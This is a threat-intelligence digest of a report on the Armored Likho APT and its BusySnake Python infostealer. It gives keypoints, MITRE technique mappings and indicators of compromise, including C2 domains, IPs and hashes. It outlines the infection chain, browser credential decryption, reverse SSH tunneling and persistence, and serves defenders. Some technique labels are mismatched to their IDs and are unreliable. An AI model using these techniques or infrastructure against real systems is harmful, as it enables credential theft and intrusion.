Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign

Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign
Researchers uncovered Armored Likho, a previously unknown APT also linked to Eagle Werewolf, running phishing campaigns against government and electric power targets in Russia, Brazil, and Kazakhstan. The group deploys BusySnake Stealer, an AI-assisted Python infostealer with browser credential theft, cookie theft, reverse SSH tunneling, and scheduled-task persistence, while Kaspersky detects and blocks the activity. #ArmoredLikho #EagleWerewolf #BusySnakeStealer #AquilaRAT #Go2Tunnel #RustDesk

Keypoints

  • Armored Likho is a newly identified APT group, also associated with Eagle Werewolf based on circumstantial evidence.
  • The campaign targets government agencies and the electric power sector, with confirmed activity in Russia, Brazil, and Kazakhstan.
  • Initial access commonly relies on spear-phishing emails carrying malicious EXE, LNK, RAR, ZIP, or BAT-based payloads disguised as official notices or aid-related documents.
  • The main payload is BusySnake Stealer, a Python-based infostealer protected with PyArmor and designed to evade static and dynamic analysis.
  • The malware steals clipboard data, browser passwords, cookies, documents, screenshots, Telegram data, wallet files, and OTP-related secrets.
  • BusySnake Stealer includes built-in reverse SSH tunneling and scheduled-task persistence, showing increasing operational maturity and tool integration.
  • Kaspersky solutions detect the attack chain, including the LNK downloader stage and subsequent payload delivery from GitHub and attacker-controlled infrastructure.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The actors deliver malicious archives and files through targeted emails themed as government notices or social programs. (‘attackers distributed malicious attachments inside archive files’ / ‘uses spear-phishing emails’)
  • [T1204.002] User Execution: Malicious File – Victims are tricked into opening EXE, LNK, or archive-contained payloads that start the infection chain. (‘when the victim opens the file’ / ‘when the user runs the malicious LNK file’)
  • [T1218.011] System Binary Proxy Execution: Rundll32 – The LNK chain uses rundll32.exe to run an obfuscated command that launches PowerShell. (‘the shortcut runs an obfuscated command via rundll32.exe’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to download and execute the loader. (‘spawns a PowerShell command that downloads and executes the malicious loader’)
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – VBScript files are created to delete the initial loader and launch the payload. (‘creates two VBScript files’ / ‘used to wipe the initial pnx.exe loader’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Persistence is maintained by creating a scheduled task that runs the stealer every five minutes. (‘used to ensure persistence on the system by creating a scheduled task’)
  • [T1055] Process Injection – The dropper injects code into pnx.exe process memory to execute the malicious loader. (‘Code is then injected into the pnx.exe process memory’)
  • [T1027] Obfuscated Files or Information – The campaign heavily uses obfuscation, including hidden command lines, encrypted code, and protected payloads. (‘obfuscated command’ / ‘code is obfuscated and encrypted using PyArmor Pro’)
  • [T1105] Ingress Tool Transfer – The malware downloads multiple archives, Python components, browser modules, and payloads from GitHub and attacker infrastructure. (‘fetches several archives hosted in GitHub repositories’)
  • [T1071.001] Application Layer Protocol: Web Protocols – The stealer communicates with its C2 using HTTP/HTTPS endpoints and web requests. (‘GET /get_task’ / ‘POST /report_status’)
  • [T1119] Automated Collection – The malware continuously inventories files, scans for keys, and harvests browser and clipboard data. (‘enumerates files and directories’ / ‘polls the clipboard contents in an infinite loop’)
  • [T1115] Clipboard Data – The stealer collects clipboard contents and OTP secrets from the clipboard. (‘begins harvesting data from the system clipboard’)
  • [T1005] Data from Local System – Files, browser databases, Telegram data, and wallet files are collected from local storage. (‘sweeps user directories’ / ‘harvests Telegram session and credential data’)
  • [T1003.001] OS Credential Dumping: LSASS Memory Not Used; Browser Credential Storage – The stealer decrypts and steals Chromium and Firefox saved passwords. (‘decrypts stored passwords from Chromium-based browser databases’ / ‘PK11SDR_Decrypt’)
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – Browser login data and cookies are extracted from browser databases. (‘extracts cookies using a workflow nearly identical to its browser credential theft routine’)
  • [T1041] Exfiltration Over C2 Channel – Stolen data is uploaded to the attacker-controlled C2 server. (‘forwarded to the C2 server’ / ‘exfiltrates it to the C2 server’)
  • [T1021.002] Remote Services: SMB/Windows Admin Shares Not Used; Remote SSH Tunneling – The malware establishes a reverse SSH tunnel for remote access. (‘initiates a connection to a remote server controlled by the attackers’)
  • [T1106] Native API – Windows DPAPI and NSS functions are used to decrypt protected browser secrets. (‘win32crypt.CryptUnprotectData()’ / ‘PK11SDR_Decrypt()’)
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – The malware uses delayed execution and dynamic decryption to hinder analysis. (‘pauses execution before triggering malicious routines’ / ‘decrypts its bytecode only at the exact moment a function is called’)

Indicators of Compromise

  • [IP address ] C2 and tunnel infrastructure – 159.198.41.140, 159.198.32.222, and other 2 items
  • [Domain ] C2 and tunneling endpoints – grked[.]online, winupdate[.]live, and other 5 items
  • [File hash ] First-stage and stealer samples – 5D5C3E483C5E544260CE98FC29FBF192, C7622A1EFFA27BBFEE6D6E03D6474343, and other 17 items
  • [File name ] Malicious archives, droppers, and payloads – psihologicheskiy_test.exe, module.pyw, and other 15 items
  • [File name ] Persistence and data files – wh_selfdelete.vbs, run.vbs, chromium_passwords.json, and other 4 items
  • [URL ] C2 tasking and tunnel creation – https://grked[.]online/tunnel/create/?username=[redacted], http://127.0.0.1:8000/?data_type=c
  • [Registry / path ] Working and staging locations – RoamingWindowsHelperscreenshots.lock, $appdataWindowsHelper, and other 3 items


Read more: https://securelist.com/tr/armored-likho-apt-with-busysnake-stealer/120292/